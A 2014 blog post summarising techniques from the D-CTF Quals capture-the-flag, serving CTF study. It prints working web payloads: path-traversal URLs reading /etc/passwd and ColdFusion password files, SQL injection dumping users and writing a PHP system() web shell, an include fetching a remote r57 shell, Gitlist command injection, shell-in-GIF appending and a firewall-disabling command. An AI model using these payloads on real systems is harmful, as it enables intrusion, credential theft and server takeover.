exploring-d-ctf-quals-2014s-exploits.html

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Exploring D-CTF Quals 2014's Exploits</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="">
    <meta name="author" content="Marina von Steinkirch">

    <!-- Le styles -->
    <link rel="stylesheet" href="./theme/css/bootstrap.dark.css" type="text/css" />
    <style type="text/css">
      body {
        padding-top: 60px;
        padding-bottom: 40px;
      }
      .tag-1 {
        font-size: 13pt;
      }
      .tag-2 {
        font-size: 11pt;
      }
      .tag-2 {
        font-size: 10pt;
      }
      .tag-4 {
        font-size: 8pt;
     }
    </style>
    <link href="./theme/css/bootstrap-responsive.dark.css" rel="stylesheet">
    <link href="./theme/css/font-awesome.css" rel="stylesheet">
    <link href="./theme/css/pygments.css" rel="stylesheet">


    <!-- Le fav and touch icons -->
    <link rel="shortcut icon" href="./theme/images/favicon.ico">
    <link rel="apple-touch-icon" href="./theme/images/apple-touch-icon.png">
    <link rel="apple-touch-icon" sizes="72x72" href="./theme/images/apple-touch-icon-72x72.png">
    <link rel="apple-touch-icon" sizes="114x114" href="./theme/images/apple-touch-icon-114x114.png">

    <link href="./feeds/all.atom.xml" type="application/atom+xml" rel="alternate" title="chmod +x singularity.sh ATOM Feed" />

  </head>

  <body>

    <div class="navbar navbar-fixed-top">
      <div class="navbar-inner">
        <div class="container-fluid">
          <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </a>
          <a class="brand" href="./index.html">chmod +x singularity.sh </a>
          <div class="nav-collapse">
            <ul class="nav">
                          <li class="divider-vertical"></li>

                          <ul class="nav pull-right">
                                <li><a href="./authors.html">About</a></li>
                                <li><a href="./archives.html"><b>Archives</b></a></li>
                                <li>
                                  <a href="https://github.com/bt3gl">github
                                  <!--<i class="icon-github-sign icon-large" ></i>-->
                                </a></li>
                                <li>
                                  <a href="https://twitter.com/1bt337">
                                  <!--<i class="icon-twitter-sign icon-large"></i> -->
                                  twitter
                                </a></li>
                                <li><a href="http://bt3gl.github.io/projects_page/index.html">Bygone Playful Times
                                </a></li>
                          </ul>

            </ul>
            <!--<p class="navbar-text pull-right">Logged in as <a href="#">username</a></p>-->
          </div><!--/.nav-collapse -->
        </div>
      </div>
    </div>

    <div class="container-fluid">
      <div class="row">
        <div class="span9" id="content">
<section id="content">
        <article>
                <header>
                        <h1>
                                <a href=""
                                        rel="bookmark"
                                        title="Permalink to Exploring D-CTF Quals 2014's Exploits">
                                        Exploring D-CTF Quals 2014's Exploits
                                </a>
                        </h1>
                </header>
                <div class="entry-content">
                <div class="well">
<footer class="post-info">
<abbr class="published" title="2014-10-22T06:30:00">
      Wed 22 October 2014 </abbr>

<span class="label"> Category</span>
<a href="./category/web-security.html"><i class="icon-folder-open"></i>Web Security</a>


<span class="label">Tags</span>
	<a href="./tag/linux.html"><i class="icon-tag"></i>Linux</a>
	<a href="./tag/rfi.html"><i class="icon-tag"></i>RFI</a>
	<a href="./tag/sql_injection.html"><i class="icon-tag"></i>SQL_injection</a>
	<a href="./tag/lfi.html"><i class="icon-tag"></i>LFI</a>
	<a href="./tag/rce.html"><i class="icon-tag"></i>RCE</a>
	<a href="./tag/php.html"><i class="icon-tag"></i>PHP</a>
	<a href="./tag/cms.html"><i class="icon-tag"></i>CMS</a>
	<a href="./tag/apphp.html"><i class="icon-tag"></i>ApPHP</a>
	<a href="./tag/unoconv.html"><i class="icon-tag"></i>unoconv</a>
	<a href="./tag/coldfusion.html"><i class="icon-tag"></i>ColdFusion</a>
	<a href="./tag/buffer_overflow.html"><i class="icon-tag"></i>Buffer_Overflow</a>
	<a href="./tag/steganography.html"><i class="icon-tag"></i>Steganography</a>
	<a href="./tag/wireshark.html"><i class="icon-tag"></i>Wireshark</a>
	<a href="./tag/exiftool.html"><i class="icon-tag"></i>ExifTool</a>
	<a href="./tag/netsh.html"><i class="icon-tag"></i>netsh</a>
	<a href="./tag/ctf.html"><i class="icon-tag"></i>CTF</a>
	<a href="./tag/scapy.html"><i class="icon-tag"></i>scapy</a>
	<a href="./tag/rips.html"><i class="icon-tag"></i>RIPS</a>
	<a href="./tag/heartbleed.html"><i class="icon-tag"></i>Heartbleed</a>
	<a href="./tag/nmap.html"><i class="icon-tag"></i>nmap</a>
</footer><!-- /.post-info -->                </div>
                <p>Last weekend I played some of the <a href="http://dctf.defcamp.ro/challs">DEFCAMP CTF Quals</a>. It was pretty intense. For (my own)  organizational purposes, I made a list of all the technologies and vulnerabilities  found in this CTF, some based on my team's game, some based on the <a href="https://github.com/ctfs/write-ups/tree/master/d-ctf-2014/">CTF write-ups git repo</a>.</p>
<h2>Vulnerabilities</h2>
<h3>Remote File Inclusion and Local File Inclusion Vulnerabilities</h3>
<p>In <a href="http://projects.webappsec.org/w/page/13246955/Remote%20File%20Inclusion">Remote File Inclusion</a> (RFI) an attacker can load exploits to the server. An attacker can use RFI to run exploits in both server and client sides. PHP's <a href="http://php.net/manual/en/function.include.php">include()</a> is extremely vulnerable to RFI attacks.</p>
<p><a href="https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion">Local File Inclusion</a> (LFI) is similar to RFI but only files that are currently in the server can be included.  This type of vulnerability is seem in forms for file uploading (with improper sanitation).</p>
<p>An example of RFI exploitation is the case where the form only accepts some type of extensions (such as JPG or PNG) but the verification is made in the client side. In this case, an attacker can tamper the HTTP requests to send shell code (with PHP extension, for example). I've shown examples of this attack in the  <a href="http://bt3gl.github.io/exploiting-the-web-in-20-lessons-natas.html">Natas post</a>. There  I've explained that the trick was to rename a PHP shell code to one of these safe extensions.</p>
<h3>TimThumb and LFI</h3>
<p><a href="https://code.google.com/p/timthumb/">TimThumb</a> is a PHP script for manipulating web images. It was recently <a href="http://www.binarymoon.co.uk/2014/09/timthumb-end-life/">discontinued because of security issues</a>.</p>
<p>With TimThumb 1.33, an attacker is able to upload a shell by appending it to an image. All  she needs to do is to have it in some online subdomain. TimThumb will store this image in a cache folder and generate a MD5 of the full path of the shell. The last step is to perform a LFI attack with the shell in this folder. Check this <a href="http://kaoticcreations.blogspot.com/2011/12/lfi-tip-how-to-read-source-code-using.html">example of LFI exploitation</a>.</p>
<h3>CMS Mini and RFI</h3>
<p><a href="http://www.mini-print.com/">CMS Mini</a> is file system to build simple websites. It has <a href="http://www.exploit-db.com/exploits/33030/">several vulnerabilities</a> such as <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)">CSRF</a>, RFI, and <a href="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)">XSS</a>.</p>
<p>An example of RFI vulnerability in CMS Mini is explored using curl:</p>
<div class="highlight"><pre><span class="err">http://</span>
<span class="err">[target/IP]/cmsmini/admin/edit.php?path=&amp;name=../../../../../etc/passwd</span>
</pre></div>


<p>For more examples of exploits, check <a href="http://en.1337day.com/exploit/22391">1337day</a> and <a href="http://www.exploit-db.com/exploits/28128/">this exploit-db</a>.</p>
<h3>ApPHP and Remote Code Execution</h3>
<p><a href="http://www.apphp.com/">ApPHP</a> is a blog script. It is known for having  <a href="http://www.exploit-db.com/exploits/33030/">several vulnerabilities</a>, including <a href="https://www.owasp.org/index.php/PHP_Top_5#P1:_Remote_Code_Execution">remote code execution</a> (RCE). An example of RCE exploit for ApPHP <a href="http://www.exploit-db.com/exploits/33070/">can be seen here</a>. A good start is to check the PHP's <a href="http://php.net/manual/en/ini.core.php#ini.disable-functions">disable_function</a> list for stuff to hacker the server.</p>
<p>In this CTF, the challenge was to find what was not in that list. For instance, it was possible to use <a href="http://php.net/manual/en/reserved.variables.post.php">$_POST</a> and <a href="http://php.net/manual/en/reserved.variables.cookies.php">$_COOKIE</a> to send strings to functions such as <a href="http://php.net/manual/en/function.scandir.php">scandir()</a> and <a href="http://php.net/manual/en/function.file-get-contents.php">get_file_contents()</a>:</p>
<div class="highlight"><pre><span class="err">GET Request: ?asdf);print_r(scandir(implode($_COOKIE))=/</span>
<span class="err">Cookie: 0=include</span>
</pre></div>


<p>In addition, with a writable directory we can drop a shell in the server (you can use script-kiddies scripts like <a href="http://www.r57shell.net/">r57 shell.net</a>, but in real life, keep in mind that they are super uber <a href="http://thehackerblog.com/hacking-script-kiddies-r57-gen-tr-shells-are-backdoored-in-a-way-you-probably-wouldnt-guess/#more-447">backdoored</a>).</p>
<div class="highlight"><pre><span class="err">Post Request: 0=include/myfile.php</span>
<span class="err">Cookie: 0=http://www.r57shell.net/shell/r57.txt</span>
</pre></div>


<h3>Gitlist and Remote Command Execution</h3>
<p><a href="http://gitlist.org/">Gitlist</a> is an application to browse github repositories in a browser. The  versions up to 5.0 are known for <a href="http://www.websecuritywatch.com/arbitrary-command-execution-in-gitlist/">allowing remote attackers to execute arbitrary commands via shell</a>, a type of <a href="http://cwe.mitre.org/data/definitions/77.html">command injection</a>. Exploits for this vulnerability can be seen at <a href="http://hatriot.github.io/blog/2014/06/29/gitlist-rce/">hatriot</a>, at <a href="http://packetstormsecurity.com/files/127364/Gitlist-Unauthenticated-Remote-Command-Execution.html">packet storm</a>, at <a href="http://en.1337day.com/exploit/22391">1337day</a>, and at <a href="http://www.exploit-db.com/exploits/33990/">exploit-db</a>.</p>
<p>In this CTF, the following command could be used to look for the flag:</p>
<div class="highlight"><pre><span class="err">http://10.13.37.33/gitlist/redis/blame/unstable/README%22%22%60ls%20-al%60</span>
</pre></div>


<h3>LibreOffice's Socket Connections</h3>
<p>LibreOffice's has a binary <a href="http://www.processlibrary.com/en/directory/files/soffice/66728/">soffice.bin</a> that takes socket connections on the <em>port 2002</em> (in this CTF, in the VPN's localhost).</p>
<p>For instance, the  command <a href="http://linux.die.net/man/1/unoconv">unoconv</a> can be used  to convert a file to a LibreOffice supported format. The flag <strong>-c</strong> opens a connection by the client to connect to an LibreOffice instance. It also can be used by the listener to make LibreOffice listen.</p>
<p>From the documentation, the default connection string is:</p>
<div class="highlight"><pre><span class="err">Default connection string is &quot;socket,host=localhost,port=2002;urp;StarOffice.ComponentContext&quot;</span>
</pre></div>


<p>Therefore, you can connect to the socket and convert some document (such as <em>/flag.txt</em>) to a PDF for example:</p>
<div class="highlight"><pre><span class="nv">$ </span>unoconv --connection <span class="s1">&#39;socket,host=127.0.0.1,port=2002;urp;StarOffice.ComponentContext&#39;</span> -f pdf /flag.txt
</pre></div>


<p>An example of payload can be seen <a href="https://github.com/ctfs/write-ups/tree/master/d-ctf-2014/web-400">here</a>.</p>
<h3>ColdFusion and Local File Disclosure</h3>
<p><a href="http://en.wikipedia.org/wiki/Adobe_ColdFusion">ColdFusion</a> is an old web application development platform. It carries its own (interpreted) language, <strong>CFM</strong>, with a Java backend.</p>
<p>CFM has scripting features like ASP and PHP, and syntax resembling HTML and JavaScript.  ColdFusion scripts  have <strong>cfm</strong> and <strong>cfc</strong> file extension. For instance,  <a href="http://www.adobe.com/products/coldfusion-family.html">Adobe ColdFusion 11</a> and <a href="http://www.getrailo.org/">Railio 4.2</a>, the two platform accepting CFM,  were both released in the beginning of 2014.</p>
<p>The problem is that CFM is <a href="http://www.intelligentexploit.com/view-details.html?id=12750">vulnerable to a variety of attacks</a>, including <a href="https://www.owasp.org/index.php/Full_Path_Disclosure">Local File Disclosure</a> (LFD) and SQL injection (SQLi). Adding this to the fact that ColdFusion scripts  usually run on elevated privileged users, we have a very vulnerable platform.</p>
<h4>SQL Injection (SQLi)</h4>
<p><a href="https://www.owasp.org/index.php/SQL_Injection">SQL Injection</a> is a classic attack where one injects exploits in a <a href="http://technet.microsoft.com/en-us/library/bb264565(v=sql.90).aspx">SQL query</a>. Vulnerabilities of this type can be spot in queries such as <strong>index.php?id=1</strong>. I showed some of these exploits in my <a href="http://bt3gl.github.io/exploiting-the-web-in-20-lessons-natas.html">Natas post</a>.</p>
<p>In this CTF, these were  some of the  exploits that could be used:</p>
<ul>
<li>List everything  in a database, where <strong>0x3a</strong> is the hexadecimal symbol for <strong>:</strong>:</li>
</ul>
<div class="highlight"><pre><span class="k">UNION</span> <span class="k">ALL</span> <span class="k">SELECT</span> <span class="mi">1</span><span class="p">,</span><span class="n">concat</span><span class="p">(</span><span class="n">username</span><span class="p">,</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,</span><span class="n">password</span><span class="p">,</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,</span><span class="n">email</span><span class="p">),</span><span class="mi">3</span> <span class="k">FROM</span> <span class="n">cms</span><span class="p">.</span><span class="n">users</span><span class="c1">--</span>
</pre></div>


<ul>
<li>See the password file content:</li>
</ul>
<div class="highlight"><pre><span class="k">UNION</span> <span class="k">ALL</span> <span class="k">SELECT</span> <span class="mi">1</span><span class="p">,</span><span class="n">LOAD_FILE</span><span class="p">(</span><span class="ss">&quot;/etc/passwd&quot;</span><span class="p">),</span><span class="mi">3</span><span class="c1">--</span>
</pre></div>


<ul>
<li>Write files and create a PHP shell into <strong>URL/shell.php</strong>, we can use a parameter <strong>x</strong> to takes a parameter to be executed (based on <a href="https://github.com/ctfs/write-ups/tree/master/d-ctf-2014/web-400">this</a>):</li>
</ul>
<div class="highlight"><pre><span class="nt">UNION</span> <span class="nt">ALL</span> <span class="nt">SELECT</span> <span class="nt">1</span> <span class="s2">&quot;&lt;?php header(&quot;</span><span class="nt">Content-Type</span><span class="o">:</span> <span class="nt">text</span><span class="o">/</span><span class="nt">plain</span><span class="o">;</span><span class="nt">charset</span><span class="o">=</span><span class="nt">utf-8</span><span class="s2">&quot;); echo system($-GET</span><span class="cp">[</span><span class="s2">&quot;x&quot;</span><span class="cp">]</span><span class="s2">); ?&gt;&#39;,3 INTO OUTFILE &#39;/var/www/html/shell.php&quot;</span><span class="nt">--</span>
</pre></div>


<p>Notice the <em>trailing pair of hyphens</em> <strong>--</strong> which specifies to most database servers that the remainder of the statement is to be treated as a comment and not executed (it removes the trailing single-quote left over from the modified query). To learn more about how to mitigate SQLi, I recommend <a href="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet">OWASP's SQLi Prevention Cheat Sheet</a> and <a href="http://owtf.github.io/boilerplate-templates/SQLinjection.html">this nice guide for SQLi mitigation</a> by OWSAP OWTF.</p>
<p>By the way, it's useful in general to know <a href="http://www.w3schools.com/tags/ref_urlencode.asp">HTML URL Encoding</a> to craft these URLs.</p>
<h3>CesarFTP 0.99g and Buffer Overflow</h3>
<p><a href="http://www.softpedia.com/get/Internet/Servers/FTP-Servers/Cesar-FTP.shtml">CesarFTP 0.99g</a> is an easy-to-use  FTP server. It is also known for having several vulnerabities, including <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2961">buffer overflow</a>.</p>
<p>For example, see this exploit for <strong>Metasploit</strong> from <a href="http://www.exploit-db.com/exploits/16713/">exploit-db</a> (or <a href="http://www.exploit-db.com/exploits/1906/">an older one here</a>).</p>
<h4>File Disclosure of Password Hashes</h4>
<p>This vulnerability provides a 30 second window in the Administration panel, which can e use to write a shell code. The main idea is a <a href="https://www.owasp.org/index.php/Path_Traversal">directory traversal</a> to the <strong>password.proprieties</strong> that can be used to login in the server.</p>
<p>Ingredients of this attack are:</p>
<ul>
<li>
<p>The target must have ColdFusion administrator available, which is by default mapped to <strong><em>CFIDE/administrator/enter.cfm</em></strong>. If it gets <a href="http://en.wikipedia.org/wiki/List_of_HTTP_status_codes">500</a>, it should be switched to HTTPS.</p>
</li>
<li>
<p>At the ColdFusion administrator, verify the version, and then use these injections:</p>
</li>
</ul>
<div class="highlight"><pre><span class="p">(</span><span class="n">Version</span> <span class="mi">6</span><span class="p">)</span><span class="o">:</span> <span class="n">http</span><span class="o">:</span><span class="c1">//site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en</span>

<span class="p">(</span><span class="n">Version</span> <span class="mi">7</span><span class="p">)</span><span class="o">:</span> <span class="n">http</span><span class="o">:</span><span class="c1">//site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en</span>

<span class="p">(</span><span class="n">Version</span> <span class="mi">8</span><span class="p">)</span><span class="o">:</span> <span class="n">http</span><span class="o">:</span><span class="c1">//site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en</span>

<span class="p">(</span><span class="n">All</span> <span class="n">versions</span><span class="p">)</span><span class="o">:</span> <span class="n">http</span><span class="o">:</span><span class="c1">//site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en</span>
</pre></div>


<ul>
<li>Now a shell can be written to a file and added in <strong>Schedule New Task</strong>. See detailed instructions at <a href="http://www.blackhatlibrary.net/Coldfusion_hacking">blackhatlib</a>, at <a href="http://www.infointox.net/?p=59">infointox</a>, at <a href="http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/">gnucitizen</a>, at <a href="http://kaoticcreations.blogspot.com/2012/11/hacking-cold-fusion-servers-part-i.html">kaoticcreations</a>, at <a href="https://www.cyberguerrilla.org/blog/?p=18275">cyberguerilla</a>, at <a href="http://jumpespjump.blogspot.com/2014/03/attacking-adobe-coldfusion.html">jumpespjump</a>, and at <a href="http://hexale.blogspot.com/2008/07/how-to-decrypt-coldfusion-datasource.html">hexale</a>.</li>
</ul>
<hr />
<h2>Useful Tools</h2>
<h3>Vulnerability Scanners</h3>
<p>Vulnerability scanners can be useful for several problems. For instance, for a PHP static source code analyser, we can use <a href="http://rips-scanner.sourceforge.net/">RIPS</a>.</p>
<p>In this CTF we had to scan for <a href="http://en.wikipedia.org/wiki/Heartbleed">Heartbleed</a>, and we used <a href="https://gist.githubusercontent.com/eelsivart/10174134/raw/5c4306a11fadeba9d9f9385cdda689754ca4d362/heartbleed.py">this script</a>.</p>
<h3>Scapy</h3>
<p><a href="http://packetlife.net/blog/2011/may/23/introduction-scapy/">Scapy</a> is a Python lib for crafting packets. It can be useful for problems such as <a href="http://en.wikipedia.org/wiki/Port_knocking">port knocking</a>. For illustration, check this <a href="http://eindbazen.net/2011/12/phd-ctf-quals-2011-%E2%80%93-port-knocking/">example from PHD CTF 2011</a> and this from <a href="http://blog.dul.ac/2014/05/ASISCTF14/">ASIS CTF 2014</a>. Check <a href="https://code.google.com/p/pypk/source/browse/branches/release-0.1.0/knocker.py?r=3">this project</a> too.</p>
<h3>Steganography</h3>
<p>One of the questions had a reference to the <a href="https://ccrma.stanford.edu/~eberdahl/Projects/Paranoia/">paranoia.jar</a> tool, which hides text in an image file using <a href="http://en.wikipedia.org/wiki/Advanced_Encryption_Standard">128 bit AES</a> encryption.</p>
<p>To run the tool (after downloading it) just do:</p>
<div class="highlight"><pre>java -jar paranoia.jar
</pre></div>


<h3>HTTP/HTTPS Request Tampering</h3>
<p>Very useful for the RFI problems (but not limited to them):</p>
<ul>
<li><a href="https://addons.mozilla.org/en-US/firefox/addon/tamper-data/">Tamper Data</a>: view and modify HTTP/HTTPS headers.</li>
<li><a href="http://portswigger.net/burp/">Burp</a>: a Java application to secure or penetrate web applications.</li>
</ul>
<h3>Wireshark</h3>
<p>At some point I'm going to dedicate an entire post for <a href="https://www.wireshark.org/">Wireshark</a>, but for this CTF the important things to know were:</p>
<ul>
<li>Look for POST requests:</li>
</ul>
<div class="highlight"><pre><span class="n">http</span><span class="p">.</span><span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="s">&quot;POST&quot;</span>
</pre></div>


<ul>
<li>Submit the found data (same username, nonce, and password) with the command:</li>
</ul>
<div class="highlight"><pre><span class="err">$</span> <span class="n">curl</span> <span class="o">--</span><span class="n">data</span> <span class="err">&#39;</span><span class="n">user</span><span class="o">=</span><span class="n">manager</span><span class="o">&amp;</span><span class="n">nonce</span><span class="o">=</span><span class="mi">7413734</span><span class="n">ab666ce02cf27c9862c96a8e7</span><span class="o">&amp;</span><span class="n">pass</span><span class="o">=</span><span class="mi">3</span><span class="n">ecd6317a873b18e7dde351ac094ee3b</span><span class="err">&#39;</span> <span class="n">HOST</span>
</pre></div>


<h3><a href="http://en.wikipedia.org/wiki/Exchangeable_image_file_format">Exif</a> data extractor:</h3>
<p><a href="http://www.sno.phy.queensu.ca/~phil/exiftool/index.html">ExifTool</a>  is used for reading, writing, and manipulating image metadata:</p>
<div class="highlight"><pre><span class="nv">$ </span>tar -xf Image-ExifTool-9.74.tar.gz
<span class="nv">$ </span> <span class="nb">cd </span>Image-ExifTool-9.74/
<span class="nv">$ </span>perl Makefile.PL
<span class="nv">$ </span>make <span class="nb">test</span>
<span class="nv">$ </span>sudo make install
<span class="nv">$ </span>exiftool IMAGEFILE
</pre></div>


<h3>MD5 Lookups</h3>
<p>Several hashes in this CTF needed to be searched. Google in general does a good job, but here are some specific websites: <a href="http://hash-killer.com/">hash-killer</a> and <a href="http://www.md5this.com/">md5this</a>.</p>
<h3>In the Shell</h3>
<ul>
<li><strong>Hexadecimal decoders</strong> are essential. You can use Python's <a href="https://docs.python.org/2/library/functions.html#hex">hex</a>:</li>
</ul>
<div class="highlight"><pre><span class="nv">$ </span>python -c <span class="s1">&#39;print &quot;2f722f6e6574736563&quot;.decode(&quot;hex&quot;)&#39;</span>
/r/netsec
</pre></div>


<p>or command line <a href="http://linuxcommand.org/man_pages/xxd1.html">xxd</a>:</p>
<div class="highlight"><pre><span class="nv">$ </span>yum install vim-common
<span class="nv">$ </span>xxd -r -p <span class="o">&lt;&lt;&lt;</span> 2f722f6e6574736563
/r/netsec
</pre></div>


<ul>
<li><strong>Base64 decoders</strong> are also essential:</li>
</ul>
<div class="highlight"><pre><span class="nv">$ </span>base64 --decode <span class="o">&lt;&lt;&lt;</span> BASE64STRING &gt; OUTPUT
</pre></div>


<ul>
<li><strong>nmap</strong>, obviously. You can use it in Python scripts, using the <a href="https://docs.python.org/2/library/subprocess.html">subprocess</a> library:</li>
</ul>
<div class="highlight"><pre><span class="k">print</span> <span class="s">&quot;[*] Scanning for open ports using nmap&quot;</span>
<span class="n">subprocess</span><span class="o">.</span><span class="n">call</span><span class="p">(</span><span class="s">&quot;nmap -sS -sV -T4 -p 22-2048 &quot;</span> <span class="o">+</span> <span class="n">base_URL</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
</pre></div>


<ul>
<li><strong>tee</strong> is nice to store and view the output of another command. It can be very useful with <em>curl</em>. A simple  example:</li>
</ul>
<div class="highlight"><pre><span class="nv">$ </span>ls | tee file
</pre></div>


<ul>
<li>
<p><strong>chattr</strong> is used to change the file attributes of a Linux file system. For example, the command <code>chattr +i</code> on a file make it not be able to be removed (useful for <em>zombie</em> processes hunting).</p>
</li>
<li>
<p><strong>nm</strong> is useful for listing symbols from object files</p>
</li>
<li>
<p><strong>md5 hashing</strong> is used all the time:</p>
</li>
</ul>
<div class="highlight"><pre><span class="nv">$ </span><span class="nb">echo</span> -n password | md5sum
5f4dcc3b5aa765d61d8327deb882cf99
</pre></div>


<ul>
<li>You might want to <strong>append a shell code to an image</strong> (for example, a GIF file):</li>
</ul>
<div class="highlight"><pre><span class="nv">$ </span>cat PHP-shell.php &gt;&gt; fig.gif
</pre></div>


<ul>
<li>Now a special one: Windows! One of the trivia questions in this CTF. How to disable the Windows XP Firewall from command line:</li>
</ul>
<div class="highlight"><pre>netsh firewall <span class="nb">set </span>opmode <span class="nv">mode</span><span class="o">=</span>DISABLE.
</pre></div>


<hr />
<p><strong>That's it. Hack all the things!</strong></p>
                </div><!-- /.entry-content -->
                <div class="comments">
                <h2>Comments !</h2>
                        <div id="disqus_thread"></div>
                        <script type="text/javascript">
                           var disqus_identifier = "exploring-d-ctf-quals-2014s-exploits.html";
                           (function() {
                                var dsq = document.createElement('script');
                                dsq.type = 'text/javascript'; dsq.async = true;
                                dsq.src = 'http://bt3gl.disqus.com/embed.js';
                                (document.getElementsByTagName('head')[0] ||
                                 document.getElementsByTagName('body')[0]).appendChild(dsq);
                          })();
                        </script>
                </div>
        </article>
</section>
        </div><!--/span-->


      </div><!--/row-->



      <footer>
        <address id="about">

        </address><!-- /#about -->

      </footer>

    </div><!--/.fluid-container-->


    <script src="./theme/js/jquery-1.7.2.min.js"></script>
    <script src="./theme/js/bootstrap.min.js"></script>
  </body>
</html>